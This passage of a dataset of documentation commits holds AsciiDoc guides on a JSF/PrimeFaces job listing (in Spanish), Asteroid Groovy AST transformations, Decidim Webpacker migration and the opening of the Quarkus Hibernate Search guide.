Aqu\u00ed os copio el estado de la p\u00e1gina y del backing bean con este primer paso implementado.\n\nLa p\u00e1gina:\n\n[source,xhtml,indent=0]\n----\n<ui:composition xmlns:ui=\"http:\/\/xmlns.jcp.org\/jsf\/facelets\"\n xmlns:h=\"http:\/\/xmlns.jcp.org\/jsf\/html\" \n template=\"\/WEB-INF\/plantillas\/plantilla.xhtml\"\n xmlns:p=\"http:\/\/primefaces.org\/ui\"\n xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"\n xmlns:f=\"http:\/\/xmlns.jcp.org\/jsf\/core\">\n\t\n\t<f:metadata>\n\t\t<f:viewAction action=\"#{trabajosBean.actualizaModeloTrabajos()}\"><\/f:viewAction>\n\t<\/f:metadata>\n <ui:define name=\"central\">\n\t\t<!-- listado selecci\u00f3n trabajos -->\n\t\t<h:form>\n\n\t\t<p:dataTable var=\"trabajo\" value=\"#{trabajosBean.trabajos}\">\n\t\t <p:column headerText=\"N. Registro\">\n\t\t <h:outputText value=\"#{trabajo.numeroDeRegistro}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Inicio\" priority=\"3\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraInicio}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Finalizaci\u00f3n\" priority=\"2\">\n\t\t <h:outputText value=\"#{trabajo.fechaHoraFinalizacion}\" \/>\n\t\t <\/p:column>\n\t\t \n\t\t <p:column headerText=\"Drone\" priority=\"4\">\n\t\t <h:outputText value=\"#{trabajo.droneAsignado.numeroDeSerie}\" \/>\n\t\t <\/p:column>\n\t\t<\/p:dataTable>\n\t\t<\/h:form>\n\t<\/ui:define>\n\t\n\t<!-- contenido de zona logo -->\n <ui:define name=\"logo\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelLogo.xhtml\" \/>\n <\/ui:define>\n\n\t<!-- contenido de zona barra menu -->\n <ui:define name=\"menu\">\n <ui:include src=\"\/WEB-INF\/paneles\/panelMenu.xhtml\" \/>\n <\/ui:define>\n \n\t<!-- TODO: contenido de otras zonas... -->\n\n<\/ui:composition>\n----\n\nY la clase:\n\n[source,java,indent=0]\n----\npackage com.lametaweb.jdrone.vista;\n\nimport java.util.List;\n\nimport javax.enterprise.context.RequestScoped;\nimport javax.inject.Inject;\nimport javax.inject.Named;\n\nimport com.lametaweb.jdrone.negocio.TrabajoFacade;\nimport com.lametaweb.jdrone.persistencia.Trabajo;\n\n@Named\n@RequestScoped\npublic class TrabajosBean {\n\t\n\tprivate List<Trabajo> trabajos;\n\t@Inject\n\tprivate TrabajoFacade trabajoFacade;\n\n\tpublic TrabajosBean() {\n\t\t\/\/ TODO Auto-generated constructor stub\n\t}\n\n\t\n\tpublic void actualizaModeloTrabajos(){\n\t\ttrabajos = trabajoFacade.findAll();\n\t}\n\t\n\t\n\tpublic List<Trabajo> getTrabajos() {\n\t\treturn trabajos;\n\t}\n}\n----\n\nA\u00f1adimos a continuaci\u00f3n los botones de eliminaci\u00f3n y edici\u00f3n a la tabla. La eliminaci\u00f3n la hacemos con una llamada ajax, que es el comportamiento por defecto en PrimeFaces, para que s\u00f3lo se actualice la tabla. Despu\u00e9s de comprobar que puedo eliminar un trabajo correctamente paso a implementar el cuadro de di\u00e1logo de confirmaci\u00f3n. En un borrado ya sea f\u00edsico o l\u00f3gico siempre poned antes una confirmaci\u00f3n. La manera m\u00e1s limpia de a\u00f1adir un cuadro de confirmaci\u00f3n es con un ConfirmDialog global.\n\nCuando implementamos operaciones de negocio con Hibernate ayuda bastante, durante la depuraci\u00f3n del c\u00f3digo, visualizar las sentencias SQL que Hibernate genera contra la base de datos, de modo que podamos detectar problemas con facilidad. 
Una primera aproximaci\u00f3n a esto es a\u00f1adir esta configuraci\u00f3n a Hibernate en el archivo _persistence.xml_:\n\n[source,xml,indent=0]\n----\n <property name=\"hibernate.show_sql\" value=\"true\"\/>\n <property name=\"hibernate.format_sql\" value=\"true\"\/>\n----\n\nPero esto s\u00f3lo nos sacar\u00e1 por la consola las sentencias SQL, sin los valores de los par\u00e1metros. Para mostrar estos valores tenemos que ajustar la configuraci\u00f3n de log4j a\u00f1adiendo el fichero log4j.properties en alguna carpeta del classpath y estableciendo las propiedades necesarias. Cuando necesitemos visualizar la consulta real lanzada por Hibernate contra la base de datos utilizaremos un driver de proxy jdbc como https:\/\/p6spy.github.io\/p6spy\/2.0\/install.html#generic[P6Spy].\n\n\n\n\n\n\n\n\n\n\nVER PRUEBAS CON ARQUILLIAN\nhttps:\/\/github.com\/wildfly\/boms\/tree\/master\/jboss-javaee-7.0-with-tools\n\n\n\n\n\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"14f3e007025268685c6c7651f8904b2fb760069c","subject":"Fix docs broken reference","message":"Fix docs broken reference\n","repos":"januslynd\/asteroid,grooviter\/asteroid","old_file":"asteroid-docs\/src\/docs\/asciidoc\/local.adoc","new_file":"asteroid-docs\/src\/docs\/asciidoc\/local.adoc","new_contents":"== Local Transformations\n\n\"Local AST transformations are relative to the context they are applied to. In most cases, the context is defined by an\nannotation that will define the scope of the transform. For example, annotating a field would mean that the\ntransformation applies to the field, while annotating the class would mean that the transformation applies to the whole\nclass.\"\n-- Groovy official site\n\n=== Overview\n\nIn order to create a local transformation you need to:\n\n* Create an `annotation` annotated by `@Local`\n* Create an `implementation` of the transformation extending `AbstractLocalTransformation`\n* Your implementation should be annotated by `@Phase` with the proper\n local compilation phase value set.\n\n=== @Local\n\nIn a local transformation you normally use an annotation to mark those\nparts of the code you want to transform: classes, methods... That\nannotation should be annotated as well to tell the compiler that is\ngoing to be used as a transformation marker.\n\nYou can use `@Local` to annotate a marker annotation. The only\n**mandatory** argument is the AST implementation class. 
Implementation\nclasses should always extend\n`asteroid.local.AbstractLocalTransformation` class.\n\n[source,groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsList.groovy[]\n----\n\nIf `@Local` annotation does not indicate which type of element is\nallowed to annotate by the attribute `appliedTo` then is supposed to\nbe used over an element of type `TYPE`, meaning it will be applied\nover an entire class.\n\nUnderneath the `@Local` annotation is doing:\n\n[ditaa,align=center]\n.Local annotation transformation\n....\n\n +-------------------------------+ +------------------------------------------------------+\n | | | |\n | @Local(ImplementationClass) | | @Target([ElementType.TYPE]) |\n | | | @Retention(RetentionPolicy.SOURCE) |\n | |---------->| @GroovyASTTransformationClass(\"ImplementationClass\") |\n | | | |\n +-------------------------------+ +------------------------------------------------------+\n....\n\n=== `applyTo`\n\n`applyTo` attribute is used when the transformation is applied to any\nelement type other than `TYPE`: a method, annotation, field...etc.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/WithLogging.groovy[]\n----\n\n<1> This annotation will be applied to method elements.\n<2> The class of the AST transformation implementation\n\n=== AbstractLocalTransformation\n\n`asteroid.local.AbstractLocalTransformation` exists to avoid some of the\ndefensive code that you would normally write at the beggining of an\nAST transformation.\n\nWhen coding an AST transformation you always check that the first node\nis an `AnnotationNode` and the second is the type of `ASTNode` you\nexpected to be annotated by the first node. Instead of coding that you\ncan use `AbstractLocalTransformation`.\n\nLets say I have an annotation `@ToMD5`. That annotation can only be\nused in elements of type `FIELD`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5.groovy[]\n----\n\nI would like to create a method for every field annotated by `ToMD5`\nreturning the MD5 signature of the content of that field.\n\nIn order to implement that I'm using `AbstractLocalTransformation`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5Impl.groovy[]\n----\n\n<1> Declaring when to apply this transformation with the annotation\n`@Phase` and the correspondent compilation phase.\n<2> Creating a class extending `AbstractLocalTransformation` and declaring\nthat the annotation and the affected node type are `ToMD5` and\n`FieldNode` respectively\n<3> The override method declares the correct generic type `FieldNode`.\n\nFrom this line on you don't have to be worried about casting first and\nsecond node passed to your transformation anymore.\n\nNOTE: Sometimes it comes handy to get a reference to\n`org.codehaus.groovy.control.SourceUnit`. In previous versions\n`SourceUnit` was passed as argument, but it forced to add an import\nwhether you used or not. Now it's present as a class field. 
Probably\nin future release won't be available directly but through specific\nfunctions.\n\n=== @Phase\n\n`@Phase` is a **required** annotation for both `global` and `local`\ntransformations that indicates in which compilation phase this\ntransformation will be applied.\n\nLets see how `@Phase` annotation is processed in a local transformation:\n\n[ditaa,align=center]\n.Local Transformation\n....\n\n +-----------------------------------------+ +---------------------------------------------------+\n | | | |\n | @Phase(Phase.LOCAL.SEMANTIC_ANALYSIS) | | @InheritConstructors |\n | |---------->| @GroovyASTTransformation(phase=SEMANTIC_ANALYSIS) |\n | | | |\n +-----------------------------------------+ +---------------------------------------------------+\n....\n\n`@Phase` annotation needs a value of type\n`org.codehaus.groovy.control.CompilePhase` enum, but because sometimes\nis hard to remember which phases are available depending on which type\nof transformation we are implementing and it would add one more import\nto our code, `Asteroid` provides a shortcut to these values:\n\n* `asteroid.Phase.LOCAL`\n* `asteroid.Phase.GLOBAL`\n\nThis way is always easier to remember how to get the proper\ncompilation phase. Here's an example:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsListImpl.groovy[]\n----\n\n<1> This is a local transformation to be applied during `SEMANTIC_ANALYSIS` phase.\n\nThis transformation will be applied to those `ClassNode` instances\nannotated with `@AsList`.\n\n[sidebar]\n.Groovy friendly\n****\nWhen used over a local transformation implementation in Groovy, apart\nfrom indicating the compilation phase, underneath, it saves some of\nthe boilerplate code needed to implement an instance of\n`asteroid.local.AbstractLocalTransformation`.\n\nAlthough you can create an `AbstractLocalTransformation` in\nplain Java, you then will have to annotate your transformations like\nthe old days.\n****\n\n=== Compilation errors\n\nIf at some point you would like to stop the compilation process the\nbest approach is to use `addError` method. This method is available\nin both `AbstractLocalTransformation` and `AbstractGlobalTransformation`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/GrumpyImpl.groovy[]\n----\n\n=== Checks\n\nThere are many times when you have to check if all precoditions are\ncorrect before applying a given transformation. Without this sanity\ncheck, many things could go wrong. Checks labels are an effort to\navoid boiler plate code when checking the AST state. They are inspired\nin Spock blocks.\n\nBy default checks labels are available in Asteroid local\ntransformations. All you have to do is to structure your code using\nlabels `check` and `then`.\n\nHere's an example, it's a bit silly but I think it will easy to\nunderstand. 
We have a annotation called `@Serializable`.\n\nThe transformation `SerializableImpl` will make all classes annotated\nwith `@Serializable` to implement `java.io.Serializable`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/Serializable.groovy[]\n----\n\nAs constraints I want to make sure:\n\n- The annotated class package name should should start by 'asteroid'\n- The annotated class can only have two method at most\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/SerializableImpl.groovy[]\n----\n<1> Checking the annotated class belongs to a certain `package`\n<2> Checking that the annotated node has less than two methods\n<3> Transformation code\n\n[sidebar]\n.Limitations\n****\nPlease notice at the moment checks only have a very limited\nfunctionality. They only allow a **one-line** expression. And these\nexpressions can only see `doVisit` parameter values.\n****\n\nTo prove it, there's a test with an annotated class having two\nmethods:\n\n[source, groovy]\n----\ninclude::{testTest}\/asteroid\/local\/samples\/SerializableTest.groovy[tags=checkersShouldFail]\n----\n\nAnd the test... passes :)\n\n==== Your own transformations\n\nIf you would like to add this functionality in your project, you can\nuse Asteroid utility functions to inject this behavior in your code.\n\n[source, java]\n----\ninclude::{coreMain}\/asteroid\/internal\/PhaseTransformation.java[tags=addCheckTo,indent=0]\n----\n\nThis call is taken from Asteroid local transformations. Checking is added to method `doVisit`.","old_contents":"== Local Transformations\n\n\"Local AST transformations are relative to the context they are applied to. In most cases, the context is defined by an\nannotation that will define the scope of the transform. For example, annotating a field would mean that the\ntransformation applies to the field, while annotating the class would mean that the transformation applies to the whole\nclass.\"\n-- Groovy official site\n\n=== Overview\n\nIn order to create a local transformation you need to:\n\n* Create an `annotation` annotated by `@Local`\n* Create an `implementation` of the transformation extending `AbstractLocalTransformation`\n* Your implementation should be annotated by `@Phase` with the proper\n local compilation phase value set.\n\n=== @Local\n\nIn a local transformation you normally use an annotation to mark those\nparts of the code you want to transform: classes, methods... That\nannotation should be annotated as well to tell the compiler that is\ngoing to be used as a transformation marker.\n\nYou can use `@Local` to annotate a marker annotation. The only\n**mandatory** argument is the AST implementation class. 
Implementation\nclasses should always extend\n`asteroid.local.AbstractLocalTransformation` class.\n\n[source,groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsList.groovy[]\n----\n\nIf `@Local` annotation does not indicate which type of element is\nallowed to annotate by the attribute `appliedTo` then is supposed to\nbe used over an element of type `TYPE`, meaning it will be applied\nover an entire class.\n\nUnderneath the `@Local` annotation is doing:\n\n[ditaa,align=center]\n.Local annotation transformation\n....\n\n +-------------------------------+ +------------------------------------------------------+\n | | | |\n | @Local(ImplementationClass) | | @Target([ElementType.TYPE]) |\n | | | @Retention(RetentionPolicy.SOURCE) |\n | |---------->| @GroovyASTTransformationClass(\"ImplementationClass\") |\n | | | |\n +-------------------------------+ +------------------------------------------------------+\n....\n\n=== `applyTo`\n\n`applyTo` attribute is used when the transformation is applied to any\nelement type other than `TYPE`: a method, annotation, field...etc.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/WithLogging.groovy[]\n----\n\n<1> This annotation will be applied to method elements.\n<2> The class of the AST transformation implementation\n\n=== AbstractLocalTransformation\n\n`asteroid.local.AbstractLocalTransformation` exists to avoid some of the\ndefensive code that you would normally write at the beggining of an\nAST transformation.\n\nWhen coding an AST transformation you always check that the first node\nis an `AnnotationNode` and the second is the type of `ASTNode` you\nexpected to be annotated by the first node. Instead of coding that you\ncan use `AbstractLocalTransformation`.\n\nLets say I have an annotation `@ToMD5`. That annotation can only be\nused in elements of type `FIELD`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5.groovy[]\n----\n\nI would like to create a method for every field annotated by `ToMD5`\nreturning the MD5 signature of the content of that field.\n\nIn order to implement that I'm using `AbstractLocalTransformation`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5Impl.groovy[]\n----\n\n<1> Declaring when to apply this transformation with the annotation\n`@Phase` and the correspondent compilation phase.\n<2> Creating a class extending `AbstractLocalTransformation` and declaring\nthat the annotation and the affected node type are `ToMD5` and\n`FieldNode` respectively\n<3> The override method declares the correct generic type `FieldNode`.\n\nFrom this line on you don't have to be worried about casting first and\nsecond node passed to your transformation anymore.\n\nNOTE: Sometimes it comes handy to get a reference to\n`org.codehaus.groovy.control.SourceUnit`. In previous versions\n`SourceUnit` was passed as argument, but it forced to add an import\nwhether you used or not. Now it's present as a class field. 
Probably\nin future release won't be available directly but through specific\nfunctions.\n\n=== @Phase\n\n`@Phase` is a **required** annotation for both `global` and `local`\ntransformations that indicates in which compilation phase this\ntransformation will be applied.\n\nLets see how `@Phase` annotation is processed in a local transformation:\n\n[ditaa,align=center]\n.Local Transformation\n....\n\n +-----------------------------------------+ +---------------------------------------------------+\n | | | |\n | @Phase(Phase.LOCAL.SEMANTIC_ANALYSIS) | | @InheritConstructors |\n | |---------->| @GroovyASTTransformation(phase=SEMANTIC_ANALYSIS) |\n | | | |\n +-----------------------------------------+ +---------------------------------------------------+\n....\n\n`@Phase` annotation needs a value of type\n`org.codehaus.groovy.control.CompilePhase` enum, but because sometimes\nis hard to remember which phases are available depending on which type\nof transformation we are implementing and it would add one more import\nto our code, `Asteroid` provides a shortcut to these values:\n\n* `asteroid.Phase.LOCAL`\n* `asteroid.Phase.GLOBAL`\n\nThis way is always easier to remember how to get the proper\ncompilation phase. Here's an example:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsListImpl.groovy[]\n----\n\n<1> This is a local transformation to be applied during `SEMANTIC_ANALYSIS` phase.\n\nThis transformation will be applied to those `ClassNode` instances\nannotated with `@AsList`.\n\n[sidebar]\n.Groovy friendly\n****\nWhen used over a local transformation implementation in Groovy, apart\nfrom indicating the compilation phase, underneath, it saves some of\nthe boilerplate code needed to implement an instance of\n`asteroid.local.AbstractLocalTransformation`.\n\nAlthough you can create an `AbstractLocalTransformation` in\nplain Java, you then will have to annotate your transformations like\nthe old days.\n****\n\n=== Compilation errors\n\nIf at some point you would like to stop the compilation process the\nbest approach is to use `addError` method. This method is available\nin both `AbstractLocalTransformation` and `AbstractGlobalTransformation`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/GrumpyImpl.groovy[]\n----\n\n=== Checks\n\nThere are many times when you have to check if all precoditions are\ncorrect before applying a given transformation. Without this sanity\ncheck, many things could go wrong. Checks labels are an effort to\navoid boiler plate code when checking the AST state. They are inspired\nin Spock blocks.\n\nBy default checks labels are available in Asteroid local\ntransformations. All you have to do is to structure your code using\nlabels `check` and `then`.\n\nHere's an example, it's a bit silly but I think it will easy to\nunderstand. 
We have a annotation called `@Serializable`.\n\nThe transformation `SerializableImpl` will make all classes annotated\nwith `@Serializable` to implement `java.io.Serializable`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/Serializable.groovy[]\n----\n\nAs constraints I want to make sure:\n\n- The annotated class package name should should start by 'asteroid'\n- The annotated class can only have two method at most\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/SerializableImpl.groovy[]\n----\n<1> Checking the annotated class belongs to a certain `package`\n<2> Checking that the annotated node has less than two methods\n<3> Transformation code\n\n[sidebar]\n.Limitations\n****\nPlease notice at the moment checks only have a very limited\nfunctionality. They only allow a **one-line** expression. And these\nexpressions can only see `doVisit` parameter values.\n****\n\nTo prove it, there's a test with an annotated class having two\nmethods:\n\n[source, groovy]\n----\ninclude::{testTest}\/asteroid\/local\/samples\/SerializableTest.groovy[tags=checkersShouldFail]\n----\n\nAnd the test... passes :)\n\n==== Your own transformations\n\nIf you would like to add this functionality in your project, you can\nuse Asteroid utility functions to inject this behavior in your code.\n\n[source, java]\n----\ninclude::{coreMain}\/asteroid\/internal\/LocalTransformationTransformation.java[tags=addCheckTo,indent=0]\n----\n\nThis call is taken from Asteroid local transformations. Checking is added to method `doVisit`.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"08879eb935d6c461da7281a84e67c3295a88afff","subject":"Docs: Update the module webpacker migration guide (#8180)","message":"Docs: Update the module webpacker migration guide (#8180)\n\n","repos":"AjuntamentdeBarcelona\/decidim,AjuntamentdeBarcelona\/decidim,AjuntamentdeBarcelona\/decidim,codegram\/decidim,decidim\/decidim,codegram\/decidim,codegram\/decidim,codegram\/decidim,decidim\/decidim,AjuntamentdeBarcelona\/decidim,decidim\/decidim","old_file":"docs\/modules\/develop\/pages\/guide_migrate_webpacker_module.adoc","new_file":"docs\/modules\/develop\/pages\/guide_migrate_webpacker_module.adoc","new_contents":"= Migrate to Webpacker a Decidim module\n\nDecidim modules are included to Decidim apps as gems. Since the introduction of Webpacker to manage and compile assets in Decidim, there are some changes required to make modules compatible with Decidim\n\n== About Webpacker\n\nIt's recommended to understand how Webpacker works. More information:\n\n* https:\/\/github.com\/rails\/webpacker#usage\n* https:\/\/edgeguides.rubyonrails.org\/webpacker.html\n\n== Overview\n\nThe recommended way to import assets from a gem in a Rails app using Webpacker is to publish a package in npmjs.org and include it in the package.json via `npm install`. 
Then the assets are available to Webpack via node_modules\/ folder\n\nOnce created, you should update the instructions to install the module and add the step to add the assets with npm.\n\n== Folder migration\n\nIt's recommend to migrate to the new folders structure:\n\n```\napp\/packs:\n \u251c\u2500\u2500 entrypoints\n \u2514\u2500\u2500 src\n \u2514\u2500\u2500 stylesheets\n \u2514\u2500\u2500 images\n```\n\n== Update Rails helpers\n\n`javascript_include_tag` and `stylesheet_link_tag` have been replaced by `javascript_pack_tag` and `stylesheet_pack_tag`\n\nFor images, if they are in `app\/packs\/images` you could use `image_pack_tag`.\n\n== Asset compilation\n\nAs all assets are now compiled using Webpacker without ever loading the Rails or Decidim environment, there are some new conventions how to tell Webpacker about the Decidim module's assets.\n\nTo begin with, create a new file named `config\/assets.rb` inside your Decidim module.\n\nAfter this, add the following contents in that file, depending what kind of assets your module provides:\n\n[source,ruby]\n----\n# frozen_string_literal: true\n# This file is located at `config\/assets.rb` of your module.\n\n# Define the base path of your module. Please note that `Rails.root` may not be\n# used because we are not inside the Rails environment when this file is loaded.\nbase_path = File.expand_path(\"..\", __dir__)\n\n# Register an additional load path for webpack. All the assets within these\n# directories will be available for inclusion within the Decidim assets. For\n# example, if you have `app\/packs\/src\/decidim\/foo.js`, you can include that file\n# in your JavaScript entrypoints (or other JavaScript files within Decidim)\n# using `import \"src\/decidim\/foo\"` after you have registered the additional path\n# as follows.\nDecidim::Webpacker.register_path(\"#{base_path}\/app\/packs\")\n\n# Register the entrypoints for your module. These entrypoints can be included\n# within your application using `javascript_pack_tag` and if you include any\n# SCSS files within the entrypoints, they become available for inclusion using\n# `stylesheet_pack_tag`.\nDecidim::Webpacker.register_entrypoints(\n decidim_foo: \"#{base_path}\/app\/packs\/entrypoints\/decidim_foo.js\",\n decidim_foo_admin: \"#{base_path}\/app\/packs\/entrypoints\/decidim_foo_admin.js\"\n)\n\n# If you want to import some extra SCSS files in the Decidim main SCSS file\n# without adding any extra stylesheet inclusion tags, you can use the following\n# method to register the stylesheet import for the main application.\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/foo\/app\")\n\n# If you want to do the same but include the SCSS file for the admin panel's\n# main SCSS file, you can use the following method.\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/foo\/admin\", group: :admin)\n----\n\n== Component stylesheet migration\n\nIn older Decidim versions your components could define their own stylesheet as follows:\n\n[source,ruby]\n----\nDecidim.register_component(:your_component) do |component|\n component.engine = Decidim::YourComponent::Engine\n component.stylesheet = \"decidim\/your_component\/your_component\"\n component.admin_stylesheet = \"decidim\/your_component\/your_component_admin\"\nend\n----\n\nThese were automatically included in the main application's stylesheet file and also in the admin panel's stylesheet file. 
These no longer work with Webpacker as the Decidim environment is not loaded when Webpacker compiles the assets.\n\nWhat you should do instead is to follow the asset compilation migration guide above and migrate these definitions into your module's `config\/assets.rb` file as follows:\n\n[source,ruby]\n----\n# frozen_string_literal: true\n# This file is located at `config\/assets.rb` of your module.\n\nbase_path = File.expand_path(\"..\", __dir__)\n\n# Register the additonal path for Webpacker in order to make the module's\n# stylesheets available for inclusion.\nDecidim::Webpacker.register_path(\"#{base_path}\/app\/packs\")\n\n# Register the main application's stylesheet include statement:\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/your_component\/your_component\")\n\n# Register the admin panel's stylesheet include statement:\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/your_component\/your_component_admin\", group: :admin)\n----\n","old_contents":"= Migrate to Webpacker a Decidim module\n\nDecidim modules are included to Decidim apps as gems. Since the introduction of Webpacker to manage and compile assets in Decidim, there are some changes required to make modules compatible with Decidim\n\n== About Webpacker\n\nIt's recommended to understand how Webpacker works. More information:\n\n* https:\/\/github.com\/rails\/webpacker#usage\n* https:\/\/edgeguides.rubyonrails.org\/webpacker.html\n\n== Overview\n\nThe recommended way to import assets from a gem in a Rails app using Webpacker is to publish a package in npmjs.org and include it in the package.json via `npm install`. Then the assets are available to Webpack via node_modules\/ folder\n\nOnce created, you should update the instructions to install the module and add the step to add the assets with npm.\n\n== Folder migration\n\nIt's recommend to migrate to the new folders structure:\n\n```\napp\/packs:\n \u251c\u2500\u2500 entrypoints\n \u2514\u2500\u2500 src\n \u2514\u2500\u2500 stylesheets\n \u2514\u2500\u2500 images\n```\n\n== Update Rails helpers\n\n`javascript_include_tag` and `stylesheet_link_tag` have been replaced by `javascript_pack_tag` and `stylesheet_pack_tag`\n\nFor images, if they are in `app\/packs\/images` you could use `image_pack_tag`.\n\n== Asset compilation\n\nThere's no specific or _Rails way_ to deal with assets compilation in engines, more than providing them as npm packages to be included.\n\nIn the community there are great examples of gems that have been adapted to Webpacker, such as https:\/\/github.com\/activeadmin\/activeadmin[ActiveAdmin]\n\nIn ActiveAdmin:\n\n- assets are defined in the package.json file, in an entry named `files:`\n- assets are precompiled using Rollup (a lightweigth Js compiler and packer)\n- a generator has been included to copy files to the Rails folder, do a `npm install` and install the npm package. 
See https:\/\/github.com\/activeadmin\/activeadmin\/blob\/master\/lib\/generators\/active_admin\/webpacker\/webpacker_generator.rb[the generator]\n\nIt's a good example to follow and get good practices\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"351a7bc2cebbf1bba74ea42197df9798df1f83e6","subject":"Hibernate Search documentation: Avoid using irrelevant configuration in prod mode","message":"Hibernate Search documentation: Avoid using irrelevant configuration in prod mode\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-search-orm-elasticsearch.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-search-orm-elasticsearch.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Hibernate Search guide\n:hibernate-search-doc-prefix: https:\/\/docs.jboss.org\/hibernate\/search\/6.1\/reference\/en-US\/html_single\/\ninclude::.\/attributes.adoc[]\n\nYou have a Hibernate ORM-based application? You want to provide a full-featured full-text search to your users? You're at the right place.\n\nWith this guide, you'll learn how to synchronize your entities to an Elasticsearch or OpenSearch cluster in a heartbeat with Hibernate Search.\nWe will also explore how you can query your Elasticsearch or OpenSearch cluster using the Hibernate Search API.\n\n== Prerequisites\n\n:prerequisites-time: 20 minutes\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nThe application described in this guide allows to manage a (simple) library: you manage authors and their books.\n\nThe entities are stored in a PostgreSQL database and indexed in an Elasticsearch cluster.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `hibernate-search-orm-elasticsearch-quickstart` {quickstarts-tree-url}\/hibernate-search-orm-elasticsearch-quickstart[directory].\n\n[NOTE]\n====\nThe provided solution contains a few additional elements such as tests and testing infrastructure.\n====\n\n== Creating the Maven project\n\nFirst, we need a new project. 
Create a new project with the following command:\n\n:create-app-artifact-id: hibernate-search-orm-elasticsearch-quickstart\n:create-app-extensions: hibernate-orm-panache,jdbc-postgresql,hibernate-search-orm-elasticsearch,resteasy-reactive-jackson\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven structure importing the following extensions:\n\n * Hibernate ORM with Panache,\n * the PostgreSQL JDBC driver,\n * Hibernate Search + Elasticsearch,\n * RESTEasy Reactive and Jackson.\n\nIf you already have your Quarkus project configured, you can add the `hibernate-search-orm-elasticsearch` extension\nto your project by running the following command in your project base directory:\n\n:add-extension-extensions: hibernate-search-orm-elasticsearch\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your `pom.xml`:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-search-orm-elasticsearch<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-hibernate-search-orm-elasticsearch\")\n----\n\n== Creating the bare entities\n\nFirst, let's create our Hibernate ORM entities `Book` and `Author` in the `model` subpackage.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Author extends PanacheEntity { \/\/ <1>\n\n public String firstName;\n\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER) \/\/ <2>\n public List<Book> books;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Author)) {\n return false;\n }\n\n Author other = (Author) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We are using Hibernate ORM with Panache, it is not mandatory.\n<2> We are loading these elements eagerly so that they are present in the JSON output.\nIn a real world application, you should probably use a DTO approach.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Book extends PanacheEntity {\n\n public String title;\n\n @ManyToOne\n @JsonIgnore <1>\n public Author author;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Book)) {\n return false;\n }\n\n Book other = (Book) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We mark this property with `@JsonIgnore` to avoid infinite loops when serializing with Jackson.\n\n== Initializing the REST service\n\nWhile everything is not yet set up for our REST service, we can initialize it with the standard CRUD 